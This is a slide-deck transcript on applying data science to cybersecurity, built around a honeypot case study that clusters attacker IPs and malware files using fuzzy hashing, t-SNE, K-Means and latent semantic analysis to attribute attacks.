applications of data science in cyber

27
Applications of Data Science in Cyber- Security Richard Xie https://linkedin.com/in/richardxy January 2015

Upload: richard-xie

Post on 20-Feb-2017

123 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Applications of Data Science in Cyber

Applications of Data Science in Cyber-Security

Richard Xiehttps://linkedin.com/in/richardxyJanuary 2015

Page 2: Applications of Data Science in Cyber

What is Cyber-Security?

• A.K.A– computer security, network security

• Secure network assets from intrusions and data breaches

• Assets include:– servers, work stations, mobile devices

• Layers to secure:– Firewall, operating systems, files, credentials,

etc.

Page 3: Applications of Data Science in Cyber

Why It's Important?http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Page 4: Applications of Data Science in Cyber

Severe shortage of experts predicted

Page 5: Applications of Data Science in Cyber

Cyber-Security + Data Science

Page 6: Applications of Data Science in Cyber

Common Threats

• Exploitation of software volunerabilities• Fraud: spoofing, phishing, pharming • Malicious code (worms, viruses, spyware,

etc.)• dDos

Page 7: Applications of Data Science in Cyber

How Data Science Would Help?

• Cyber-security is a big-data business– network logs– files– user-machine interactions– volume, velocity, variety, and veracity

• Data science is to be the engine to power next generation cyber-security solutions

Page 8: Applications of Data Science in Cyber

Application Examples

• Spam email classification• Malware classification• Malicious IP classification• Intrusion detection• Network anomaly detection• Hacker attribution• and more...

Page 9: Applications of Data Science in Cyber

A Real Case Study

• Hunting for Honeypot Attackers: A Data Scientist’s Adventure

• Honeynet is a set of honeypot systems deployed on internet

• Honeypot logs all hacking activities• Honeypot stores files uploaded by hackers• Malware used as hacker's weapons

Page 10: Applications of Data Science in Cyber

Raw Statistics

• Data collection period– from March 2015 through the end of June

2015• >21k attacker IP address• 36 million SSH attempts• 34k unique usernames + 1 million

passwords being tried• 500 malicious domains and >1000 unique

malware being identified

Page 11: Applications of Data Science in Cyber

Geo-location of Attacks

map_hacker_IP.py

Page 12: Applications of Data Science in Cyber

Time Series of Attacks

time_series_activity.py

Page 13: Applications of Data Science in Cyber

How raw data look like

Page 14: Applications of Data Science in Cyber

Questions to Answer

• Clustering downloaded/crawled files to find file groups/categories

• attribution– association between attacks from different

days and IPs– where they came from

Page 15: Applications of Data Science in Cyber

File Similarity Computation

• MD5 hash can't reflect slight changes in file

• Fuzzy hashing does• Using ssdeep, I computed pair-wise

similarity for all collected binary files and tar files

Page 16: Applications of Data Science in Cyber

Steps to prepare data

• readRawData.py to create a collection "downloadsCollection"

• extract_crawled_file_to_mongo.py to create crawledFileCollection

• uniq_ip_count_MR.js to create uniqURLCollection

• uniq_ip_date_MR.js to create uniqURLDateCollection

• uniq_date_ip_MR.js to create uniqDateURLCollection

• uniq_hash_count_MR.js to create uniqFileCollection

• uniq_country_count_MR.js to create uniqCountryCollection

Page 17: Applications of Data Science in Cyber

Graph of Files

two similar files have a connection, where similarity > 60% (for example)

identifySimilarDownloads.py from line 166

./graphiti demo graph_data/weighted_files2.json

Page 18: Applications of Data Science in Cyber

Files -> Hacker

• a hacker may use same/similar tools on different days to hack systems

• File similarity matrix may provide hints on who were using those files

• treat date+IP as a unique attack, and all its associated binary files as its features

• construct a term matrix for all attacks

Page 19: Applications of Data Science in Cyber

T-SNE on Attack-Malware Matrixwith K-Means Labeling

k=10

T-SNE: t-Distributed Stochastic Neighbor Embedding

get_similar_IPs.py from line 181

Page 20: Applications of Data Science in Cyber

Latent Semantic Analysis

• LSA is widely used in NLP for topic finding• Analyzes relationships between a set of

documents and the terms they contain• Uses SVD to reduce number of

dimensions while maintaining record similarities

SVD: Singular Value Decomposition

Page 21: Applications of Data Science in Cyber

Attacks Expressed with 1st and 2nd Principal Components

Each vector is a date+IP incident (a row in the term matrix)

Page 22: Applications of Data Science in Cyber

Compute Similarities among Attacks• Similar attacks to a particular one: 2015-03-23%%61.160.212.21:5947 is similar to

2015-03-23%%118.193.241.192, similarity 0.958453 2015-03-23%%222.186.190.157:56789, similarity 0.996835 2015-03-24%%222.186.190.157:56789, similarity 0.961000 2015-03-25%%117.21.176.79:333, similarity 0.997087 2015-03-25%%222.186.190.157:56789, similarity 0.946751 2015-06-17%%222.186.30.175:56789, similarity 0.996835 2015-06-17%%61.160.247.42:1988, similarity 0.996835 2015-06-18%%222.186.30.175:56789, similarity 0.996835 2015-06-18%%61.160.247.42:1988, similarity 0.996835

Page 23: Applications of Data Science in Cyber

Time Series of Attack Counts for Group 1

Page 24: Applications of Data Science in Cyber

Time Series of Attack Counts for Group 2

Page 25: Applications of Data Science in Cyber

Visualization of Attack Graph

./graphiti demo graph_data/weighted_IPs_95percent.json

Page 26: Applications of Data Science in Cyber

We know where they were from

python_map_IP_latlon.py

Page 27: Applications of Data Science in Cyber

So what?

• The analysis may leads to– near-real-time attribution (it's a new attack, or

something we saw before?)– near-real-time triage of new malware or a

variant of existing ones?– more...